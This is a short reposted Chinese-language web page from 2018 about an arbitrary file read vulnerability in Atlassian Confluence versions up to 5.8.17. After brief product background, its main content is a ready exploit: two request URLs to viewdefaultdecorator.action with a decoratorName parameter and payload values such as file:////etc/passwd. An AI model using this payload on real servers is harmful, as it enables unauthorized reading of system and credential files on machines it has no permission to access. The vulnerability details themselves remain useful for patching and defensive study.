碼上歡樂
相關內容    簡體    繁體

Atlassian Confluence任意文件讀取漏洞

本文轉載自   查看原文   2018-05-03 19:31   1625    Web安全與Web滲透

Atlassian Confluence

Atlassian Confluence是澳大利亞Atlassian公司的一套專業的企業知識管理與協同軟件,也可以用於構建企業WiKi。該軟件可實現團隊成員之間的協作和知識共享。

漏洞簡介

漏洞名稱:任意文件讀取

漏洞類型:WEB類型漏洞

影響版本:小於或等於5.8.17版本

漏洞評級:高危

漏洞詳情

漏洞請求:

https://hostdomain/spaces/viewdefaultdecorator.action?decoratorName=PAYLOAD

https://hostdomain/admin/viewdefaultdecorator.action?decoratorName=PAYLOAD

PAYLOAD =》 file:///d:/xxx/xxx 或者 file:////etc/passwd


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Adminer任意文件讀取漏洞復現 任意文件讀取與下載漏洞 任意文件讀取下載漏洞 任意文件讀取 安全研究 | Jenkins 任意文件讀取漏洞分析 代碼審計-MetInfo CMS任意文件讀取漏洞 Apache Solr最新任意文件讀取漏洞 Apache Solr任意文件讀取漏洞復現 Apache Solr任意文件讀取漏洞復現 藍凌OA前台任意文件讀取漏洞利用
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM